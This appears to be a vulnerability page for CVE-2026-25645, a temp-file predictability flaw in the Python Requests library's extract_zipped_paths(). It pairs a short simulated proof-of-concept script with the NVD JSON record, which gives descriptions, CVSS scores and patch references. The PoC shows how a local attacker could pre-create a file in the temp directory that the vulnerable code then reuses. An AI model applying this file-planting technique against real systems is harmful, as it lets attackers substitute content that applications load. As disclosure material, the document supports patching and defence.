CVE-2026-25645

import os import tempfile # This PoC demonstrates the vulnerability scenario. # It simulates an attacker creating a predictable file in the temp directory # before the vulnerable application extracts the zip. def attacker_simulation(): # 1. Determine the temp directory temp_dir = tempfile.gettempdir() # 2. Predict the filename that the vulnerable function will generate # (Based on the hash of the zip content or predictable logic in older versions) predictable_filename = "vulnerable_extract_target_file.bin" full_path = os.path.join(temp_dir, predictable_filename) print(f"[+] Attacker targeting path: {full_path}") # 3. Create the malicious file with open(full_path, 'wb') as f: f.write(b"MALICIOUS_PAYLOAD_CONTROLLED_BY_ATTACKER") print(f"[+] Malicious file created successfully.") return full_path def vulnerable_app_simulation(target_path): # This simulates the logic in requests.utils.extract_zipped_paths() # Check if file exists (The vulnerability: reusing without validation) if os.path.exists(target_path): print("[*] File found in temp dir. Reusing without extraction/validation.") with open(target_path, 'rb') as f: return f.read() else: print("[-] File not found. Extracting...") return b"LEGITIMATE_CONTENT" # Execute simulation malicious_path = attacker_simulation() loaded_content = vulnerable_app_simulation(malicious_path) print(f"[+] Content loaded by application: {loaded_content}")

{"cve": {"id": "CVE-2026-25645", "sourceIdentifier": "[email protected]", "published": "2026-03-25T17:16:52.970", "lastModified": "2026-03-30T14:23:16.127", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Requests is a HTTP library. Prior to version 2.33.0, the `requests.utils.extract_zipped_paths()` utility function uses a predictable filename when extracting files from zip archives into the system temporary directory. If the target file already exists, it is reused without validation. A local attacker with write access to the temp directory could pre-create a malicious file that would be loaded in place of the legitimate one. Standard usage of the Requests library is not affected by this vulnerability. Only applications that call `extract_zipped_paths()` directly are impacted. Starting in version 2.33.0, the library extracts files to a non-deterministic location. If developers are unable to upgrade, they can set `TMPDIR` in their environment to a directory with restricted write access."}, {"lang": "es", "value": "Requests es una biblioteca HTTP. Antes de la versión 2.33.0, la función de utilidad 'requests.utils.extract_zipped_paths()' utiliza un nombre de archivo predecible al extraer archivos de archivos zip en el directorio temporal del sistema. Si el archivo de destino ya existe, se reutiliza sin validación. Un atacante local con acceso de escritura al directorio temporal podría pre-crear un archivo malicioso que se cargaría en lugar del legítimo. El uso estándar de la biblioteca Requests no se ve afectado por esta vulnerabilidad. Solo las aplicaciones que llaman a 'extract_zipped_paths()' directamente se ven afectadas. A partir de la versión 2.33.0, la biblioteca extrae archivos a una ubicación no determinista. Si los desarrolladores no pueden actualizar, pueden establecer 'TMPDIR' en su entorno a un directorio con acceso de escritura restringido."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:R/S:U/C:N/I:H/A:N", "baseScore": 4.4, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "HIGH", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 0.8, "impactScore": 3.6}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-377"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:python:requests:*:*:*:*:*:*:*:*", "versionEndExcluding": "2.33.0", "matchCriteriaId": "B164516D-2E98-41D4-9CB7-40FD49A1B6D9"}]}]}], "references": [{"url": "https://github.com/psf/requests/commit/66d21cb07bd6255b1280291c4fafb71803cdb3b7", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/psf/requests/releases/tag/v2.33.0", "source": "[email protected]", "tags": ["Release Notes"]}, {"url": "https://github.com/psf/requests/security/advisories/GHSA-gc5v-m9x4-r6x2", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}